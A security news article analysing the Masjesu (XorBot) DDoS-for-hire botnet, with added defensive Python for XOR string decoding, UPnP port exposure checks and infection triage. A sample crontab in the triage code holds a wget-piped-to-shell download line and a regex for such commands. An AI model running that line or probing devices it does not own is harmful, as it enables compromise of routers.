CyberTimes

Masjesu Botnet: The Stealthy DDoS-for-Hire Service Quietly Hijacking IoT Devices Since 2023 — Now Hitting 300 Gbps


TL;DR — 15 Second Read

  • Masjesu (also tracked as XorBot) is a commercially operated DDoS-for-hire botnet active since 2023, advertised openly on Telegram with documented attack capacity of 290 to 300 Gbps
  • It targets routers and IoT devices from D-Link, Netgear, TP-Link, Huawei, and others — primarily using known CVEs and default credentials, with Vietnam accounting for nearly half of all infected devices
  • Unlike most botnets, Masjesu deliberately avoids US Department of Defense IP ranges and other sensitive allocations to stay under the law enforcement radar — prioritising long-term survival over maximum impact
  • The malware supports 12+ DDoS attack methods, hides its C2 strings behind a layered XOR routine that is only undone at runtime, and renames itself to mimic system components, making detection and removal significantly harder
Severity: 🟠 HIGH
CVSS Score: 8.1/10
Exploited: Yes, active
Fix Status: Check required
Owners of home and small business routers and IoT devices from D-Link, Netgear, TP-Link, Huawei, GPON routers, MVPower DVRs, and devices with UPnP services exposed — particularly older unpatched models running default or weak credentials. Organisations in Vietnam, Brazil, India, Iran, Kenya, and Ukraine have the highest concentration of infected devices. Businesses that could be targeted by DDoS attacks purchased through Masjesu's Telegram service are also at risk.

Trellix ARC researchers have published a detailed analysis of Masjesu, a commercially operated DDoS-for-hire botnet that has been quietly building its infrastructure since early 2023 while deliberately avoiding the aggressive expansion that gets botnets noticed and taken down. Also tracked as XorBot, Masjesu targets home and small business routers and IoT devices across multiple architectures, recruits paying customers through a bilingual Telegram channel, and has demonstrated attack capacity of approximately 290 to 300 Gbps. What sets it apart from the more notorious players is its operational philosophy: patience over scale, stealth over speed, and long-term survival over short-term revenue. The botnet has been operational for over three years and remains active in 2026, a mature and still-evolving commercial DDoS infrastructure that has outlasted many of its louder contemporaries.


Affected products

  • D-Link routers — multiple models targeted via CVE-2014-8361 (command injection in the Realtek SDK miniigd UPnP SOAP service) and others
  • Huawei routers — CVE-2017-17215 (HG532 UPnP remote code execution) exploited for propagation
  • TP-Link routers — CVE-2023-1389 (Archer AX21 web interface command injection) among exploits used
  • Netgear routers — multiple models affected
  • GPON routers — exploited via known vulnerabilities
  • MVPower DVRs — targeted for recruitment into botnet
  • Any IoT device with UPnP services exposed or running default credentials

Evasion and persistence

The evasion capabilities Trellix ARC documented make Masjesu harder to detect and remove than simpler IoT malware. Sensitive strings, including C2 domains, IPs and paths, are kept in an obfuscated lookup table protected by a multi-layer XOR routine and decoded only at runtime, so grepping a captured sample for IOCs yields nothing: the table has to be decoded, or the sample run or emulated, before indicators can be extracted. The malware renames its executable to mimic a legitimate system component, forks a new process, installs a cron job for persistence, and runs as a background daemon. It kills wget, curl and sshd on the infected device, both to stop rival malware from landing on the same host and to cut off remote administrators trying to regain access. The C2 architecture has evolved from a single domain with a fallback IP to multiple domains with backup addresses, which blunts the effect of any single domain takedown. Builds exist for seven architectures (i386, MIPS, ARM, SPARC, PPC, 68K (Motorola 68000) and AMD64), covering the bulk of the embedded Linux hardware deployed in routers and IoT devices.
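To make the obfuscation concrete, here is an added example (mine, not code from Trellix or from the malware) of a string table protected by a layered XOR routine and of how an analyst undoes it. The scheme copies the published Mirai table code, where every byte is XORed in turn with the four bytes of a 32-bit key; the key 0xDEADBEEF and the three strings are made up, and Masjesu's real key, layout and strings are not in the report text reproduced here. It also shows the property that matters on the analyst side: successive single-byte XOR layers collapse into one effective byte, so once the table is located, 256 guesses plus a known-plaintext crib recover every entry.

```python
"""Layered-XOR string table: how the obfuscation works and how to undo it.

Added example, not code from the Trellix report or from Masjesu itself.
The layout follows the published Mirai table scheme (each byte XORed in
turn with the four bytes of a 32-bit key); the key and strings are made up.
"""
from typing import Dict, List, Optional

TABLE_KEY = 0xDEADBEEF   # constructed; the real key is not in the article

def key_bytes(key32: int) -> List[int]:
    """Split a 32-bit key into its four bytes, low byte first."""
    return [(key32 >> shift) & 0xFF for shift in (0, 8, 16, 24)]

def multi_xor(data: bytes, key32: int) -> bytes:
    """Apply the four key bytes to every byte, one layer after another.
    XOR is its own inverse, so the same call obfuscates and deobfuscates."""
    out = bytearray(data)
    for k in key_bytes(key32):
        out = bytearray(b ^ k for b in out)
    return bytes(out)

def collapse_key(key32: int) -> int:
    """The layers commute and cancel into ONE effective byte; this is why
    stacking single-byte XORs adds no strength against analysis."""
    eff = 0
    for k in key_bytes(key32):
        eff ^= k
    return eff

# Constructed plaintexts of the kind such malware hides: a C2 hostname,
# a path template used by the process killer, an HTTP flood user-agent.
PLAINTEXT: Dict[str, bytes] = {
    "cnc_domain": b"cnc.example.invalid",
    "proc_exe":   b"/proc/%d/exe",
    "http_ua":    b"Mozilla/5.0 (Windows NT 10.0; Win64; x64)",
}

def build_table(plain: Dict[str, bytes], key32: int) -> Dict[str, bytes]:
    """What would sit in the binary's data section: nothing greppable."""
    return {name: multi_xor(val, key32) for name, val in plain.items()}

def decode_entry(table: Dict[str, bytes], name: str, key32: int) -> str:
    """Runtime decoding of one entry, as the malware does on demand."""
    return multi_xor(table[name], key32).decode("ascii")

def recover_key(blobs: List[bytes], crib: bytes) -> Optional[int]:
    """Analyst side: because the layers collapse to one byte, 256 guesses
    cover the key space. A known-plaintext crib ('/proc/' here, present in
    almost every Linux bot's table) picks out the right guess."""
    for guess in range(256):
        decoded = [bytes(b ^ guess for b in blob) for blob in blobs]
        printable = all(0x20 <= b <= 0x7E for d in decoded for b in d)
        if printable and any(crib in d for d in decoded):
            return guess
    return None

if __name__ == "__main__":
    table = build_table(PLAINTEXT, TABLE_KEY)
    print("obfuscated cnc_domain:", table["cnc_domain"].hex())
    key = recover_key(list(table.values()), b"/proc/")
    print(f"recovered 0x{key:02x}, collapse_key gives 0x{collapse_key(TABLE_KEY):02x}")
    for name, blob in table.items():
        print(f"{name:>10}: {bytes(b ^ key for b in blob).decode('ascii')}")
```

Run it and it prints the hex of the obfuscated C2 entry, the recovered effective key and each decoded string. If a real sample uses a rotating multi-byte key or a different key per entry, the collapse argument no longer applies in this simple form; the pragmatic route is then the one the paragraph implies, namely running or emulating the sample and reading the strings after it has decoded them.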


What happened

Masjesu operates on a fundamentally different philosophy from most IoT botnets. Where Mirai and its variants pursued explosive growth and maximum attack scale, Masjesu's operators have consistently prioritised operational security and long-term survival. The clearest evidence is their deliberate policy of skipping blocklisted IP ranges, including US Department of Defense allocations, whose owners would notice the scanning and infection attempts and are the most likely to refer them to law enforcement. This is not an accident. It is calculated restraint by a commercially motivated actor that needs its infrastructure to keep running.

Real-World Impact

The botnet has been active since at least 2023 under the XorBot name, first documented by NSFOCUS targeting Intelbras cameras and Netgear, TP-Link and D-Link routers. As the device count grew, the operators pivoted to a commercial model, launching a Telegram channel under the Masjesu brand to advertise DDoS-for-hire services. An earlier channel with over 2,000 subscribers was removed; a new bilingual Chinese and English channel launched in February 2025 now hosts rental details, feature updates and performance screenshots for prospective buyers. The capacity on offer is significant: roughly 290 to 300 Gbps was documented in October 2025 from an ACK flood demonstration, and the bot supports 12 or more distinct attack methods, including TCP, UDP and ICMP floods, GRE and OSPF protocol floods, Valve Source Engine query floods, and HTTP floods that imitate browser traffic with randomised headers and spoofed IPs.

Technical Details

Geographic distribution of infected devices is heavily weighted toward Vietnam, which contributes close to half of all observed Masjesu traffic, with Brazil, India, Iran, Kenya and Ukraine making up the remainder. The spread across many ASNs, most of them ISP allocations rather than VPS or cloud ranges, gives Masjesu the same advantage residential proxy networks exploit: attack traffic that originates from real home and small business connections looks like ordinary internet traffic and is hard to block with static IP-based filtering.

🛡️ Prevention Tips

Masjesu's survival since 2023 is a direct consequence of the IoT security problem the security community has documented for a decade: billions of network-connected devices running unpatched firmware with default credentials, never updated, never monitored, and never replaced even after reaching end-of-life. The practical prevention is the same as it has always been: update firmware, change default passwords, disable unnecessary services such as UPnP, and replace end-of-life hardware. The difference now is that an unpatched router is not just a risk to its owner; it becomes a weapon in a commercially operated DDoS service that any paying customer can direct at any target. Organisations that may be targets of purchased attacks should put upstream DDoS mitigation in place before an attack occurs. Reactive mitigation after a 290 Gbps flood has already hit is far harder and more expensive than pre-positioned protection.
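A check for the UPnP item in that advice, as an added example that is not from the article or the Trellix report: it unicasts an SSDP M-SEARCH to a target and reports what answers, then tests the TCP ports that the public exploits for two of the CVEs in the affected-products list connect to (52869 for the Realtek miniigd service behind CVE-2014-8361, 37215 for the Huawei HG532 service behind CVE-2017-17215). The SSDP reply embedded for testing is constructed, the 192.0.2.x addresses are documentation ranges, and the default target 192.168.1.1 is an assumed gateway address.

```python
"""UPnP exposure check for the hardening advice above.

Added example, not from the article or the Trellix report. Sends one SSDP
M-SEARCH to a host and reports any UPnP answer, then probes the TCP ports
used by the public exploits for two CVEs named in the affected-products
list. SAMPLE_REPLY is constructed; 192.0.2.x are documentation addresses.
"""
import socket
from typing import Dict, List, Optional

SSDP_PORT = 1900
# UPnP SOAP ports targeted by the public exploits for these CVEs.
UPNP_SOAP_PORTS = {
    52869: "Realtek SDK miniigd (CVE-2014-8361, D-Link and other Realtek-based routers)",
    37215: "Huawei HG532 UPnP (CVE-2017-17215)",
}

def build_msearch(host: str, st: str = "upnp:rootdevice", mx: int = 2) -> bytes:
    """SSDP discovery request. HOST names the address we send to, which is the
    well-formed shape for a unicast M-SEARCH (allowed since UPnP 1.1)."""
    return (
        "M-SEARCH * HTTP/1.1\r\n"
        f"HOST: {host}:{SSDP_PORT}\r\n"
        'MAN: "ssdp:discover"\r\n'
        f"MX: {mx}\r\n"
        f"ST: {st}\r\n"
        "\r\n"
    ).encode("ascii")

def parse_ssdp_response(raw: bytes) -> Optional[Dict[str, str]]:
    """Turn an HTTP/1.1-style SSDP reply into a header dict (names upper-cased).
    Returns None for anything that is not a 200 response."""
    lines = raw.decode("ascii", errors="replace").split("\r\n")
    if not lines or not lines[0].startswith("HTTP/1.1 200"):
        return None
    headers: Dict[str, str] = {}
    for line in lines[1:]:
        if not line:                      # blank line ends the header block
            break
        name, sep, value = line.partition(":")
        if sep:
            headers[name.strip().upper()] = value.strip()
    return headers

def ssdp_probe(host: str, timeout: float = 2.0) -> List[Dict[str, str]]:
    """Send one M-SEARCH and collect every parseable reply until timeout."""
    found: List[Dict[str, str]] = []
    with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as s:
        s.settimeout(timeout)
        s.sendto(build_msearch(host), (host, SSDP_PORT))
        try:
            while True:
                data, _ = s.recvfrom(4096)
                parsed = parse_ssdp_response(data)
                if parsed:
                    found.append(parsed)
        except socket.timeout:
            pass
    return found

def tcp_open(host: str, port: int, timeout: float = 2.0) -> bool:
    """Plain TCP connect test; any refusal or timeout counts as closed."""
    try:
        with socket.create_connection((host, port), timeout=timeout):
            return True
    except OSError:
        return False

def report(host: str) -> List[str]:
    """Human-readable findings for one target."""
    lines = []
    for r in ssdp_probe(host):
        lines.append(f"SSDP answered: SERVER={r.get('SERVER', '?')} LOCATION={r.get('LOCATION', '?')}")
    for port, what in UPNP_SOAP_PORTS.items():
        if tcp_open(host, port):
            lines.append(f"TCP/{port} open: {what}")
    return lines or ["no UPnP exposure detected"]

# Constructed reply of the kind a UPnP-enabled router returns:
SAMPLE_REPLY = (
    b"HTTP/1.1 200 OK\r\n"
    b"CACHE-CONTROL: max-age=1800\r\n"
    b"LOCATION: http://192.0.2.1:49152/rootDesc.xml\r\n"
    b"SERVER: Linux/2.6 UPnP/1.0 miniupnpd/1.0\r\n"
    b"ST: upnp:rootdevice\r\n"
    b"USN: uuid:00000000-0000-0000-0000-000000000000::upnp:rootdevice\r\n"
    b"\r\n"
)

if __name__ == "__main__":
    import sys
    target = sys.argv[1] if len(sys.argv) > 1 else "192.168.1.1"   # assumed gateway address
    print("\n".join(report(target)))
```

Run from inside the LAN it tells you whether UPnP is switched on at all; run from an outside host against your public address it tells you whether those services are reachable from the internet, which is the exposure the article is talking about. Either way, a port that answers is one to turn off in the router's settings, and on a model with no current firmware it is a reason to replace the device.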


FAQs

How do I know if my router is infected with Masjesu?

Check the device's process list for unexpected processes, particularly ones whose binary lives in /tmp/ or that carry a system-component name but run from an unusual path. Check for a TCP listener on port 55988, which Masjesu opens on infected devices for operator access. Outbound connections to unfamiliar domains, especially at regular intervals that suggest C2 beaconing, are a further indicator. Patched firmware and non-default credentials are prevention, not a detection: if you see any of these indicators, factory-reset the device, then update the firmware and change the admin password before reconnecting it.
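As an added example (not from the article or from Trellix), the following Python turns those indicators into a triage you can run over output saved from the device: it parses netstat -tln, ps and crontab -l text plus a list of outbound connection times, and flags the 55988 listener, binaries executing from writable directories, cron entries that run from /tmp or pipe a download into a shell, and evenly spaced connections that look like beaconing. All sample output below is constructed to resemble BusyBox formatting; only the port number comes from the article, and 192.0.2.10 is a documentation address.

```python
"""Host triage for the indicators in the FAQ answer above.

Added example, not from the article or the Trellix report. All sample text
is constructed to resemble BusyBox `netstat -tln`, `ps` and `crontab -l`
output; only the port number 55988 comes from the article.
"""
import re
import statistics
from typing import Iterable, List, Set

MASJESU_PORT = 55988          # operator-access listener, per the article
WRITABLE_DIRS = ("/tmp/", "/var/tmp/", "/dev/shm/")
# cron entries that run from a writable dir, or pipe a download straight into a shell
CRON_RED_FLAGS = re.compile(r"/tmp/|/var/tmp/|/dev/shm/|(wget|curl)[^|;&]*\|\s*(sh|bash)\b")

def listening_ports(netstat_text: str) -> Set[int]:
    """TCP ports in LISTEN state from netstat-style output."""
    ports: Set[int] = set()
    for line in netstat_text.splitlines():
        cols = line.split()
        if len(cols) >= 6 and cols[0].startswith("tcp") and cols[5] == "LISTEN":
            ports.add(int(cols[3].rsplit(":", 1)[1]))   # 0.0.0.0:55988 or :::55988
    return ports

def suspicious_processes(ps_text: str) -> List[str]:
    """Commands whose binary lives in a world-writable directory. Masjesu renames
    its binary to look like a system component, so match on the path, not the name."""
    hits = []
    for line in ps_text.splitlines()[1:]:            # skip header
        cols = line.split(None, 4)                   # PID USER VSZ STAT COMMAND
        if len(cols) == 5 and cols[4].startswith(WRITABLE_DIRS):
            hits.append(cols[4])
    return hits

def suspicious_cron(cron_text: str) -> List[str]:
    """Non-comment cron lines matching CRON_RED_FLAGS."""
    return [l.strip() for l in cron_text.splitlines()
            if l.strip() and not l.lstrip().startswith("#") and CRON_RED_FLAGS.search(l)]

def is_periodic(times: Iterable[float], max_cv: float = 0.1) -> bool:
    """Beacon heuristic: inter-arrival gaps whose coefficient of variation is
    below max_cv (needs at least four timestamps)."""
    ts = sorted(times)
    gaps = [b - a for a, b in zip(ts, ts[1:])]
    if len(gaps) < 3:
        return False
    mean = statistics.mean(gaps)
    return mean > 0 and statistics.pstdev(gaps) / mean < max_cv

def triage(netstat_text: str, ps_text: str, cron_text: str, c2_times: Iterable[float]) -> List[str]:
    """Collect every indicator that fires into a list of findings."""
    findings = []
    if MASJESU_PORT in listening_ports(netstat_text):
        findings.append(f"TCP listener on {MASJESU_PORT}")
    findings += [f"process running from writable dir: {p}" for p in suspicious_processes(ps_text)]
    findings += [f"suspicious cron entry: {c}" for c in suspicious_cron(cron_text)]
    if is_periodic(c2_times):
        findings.append("evenly spaced outbound connections (possible C2 beacon)")
    return findings

# --- constructed samples ---------------------------------------------------
SAMPLE_NETSTAT = """\
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address           Foreign Address         State
tcp        0      0 0.0.0.0:80              0.0.0.0:*               LISTEN
tcp        0      0 0.0.0.0:55988           0.0.0.0:*               LISTEN
tcp        0      0 :::22                   :::*                    LISTEN
"""
SAMPLE_PS = """\
  PID USER       VSZ STAT COMMAND
    1 root      1056 S    /sbin/init
  312 root      2340 S    /usr/sbin/dropbear
  877 root      4120 S    /tmp/.x/sshd
  902 root      1880 S    /bin/sh
"""
SAMPLE_CRON = """\
# m h dom mon dow command
0 3 * * * /usr/bin/logrotate /etc/logrotate.conf
*/5 * * * * /tmp/.x/sshd
@reboot wget -q -O- http://192.0.2.10/x.sh | sh
"""
BEACON_TIMES = [0, 60, 121, 180, 240, 301]     # seconds; near-constant 60 s gap

if __name__ == "__main__":
    for f in triage(SAMPLE_NETSTAT, SAMPLE_PS, SAMPLE_CRON, BEACON_TIMES):
        print("!!", f)
```

The beacon heuristic is deliberately crude (coefficient of variation of the inter-arrival gaps): it will miss jittered beacons and will flag legitimate periodic traffic such as NTP, so treat a hit as a prompt to look at the destination, not as proof of infection.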


My router model is on Masjesu's target list — what do I do?

Update firmware immediately, change admin credentials, and disable UPnP. If your model is end-of-life and no longer receiving firmware updates, replace it. Running an unpatched router means the same vulnerabilities Masjesu exploits will remain permanently open regardless of any other security measures you take.


Why is Vietnam the largest source of Masjesu-infected devices?

Vietnam has a large and rapidly growing internet user population with significant adoption of consumer routers and IoT devices, many of which run older firmware or ship with default credentials that users do not change. The combination of high device density and lower average firmware update rates makes any country with similar characteristics a prime botnet recruitment target — Vietnam happens to have the highest concentration in Masjesu's current infrastructure.

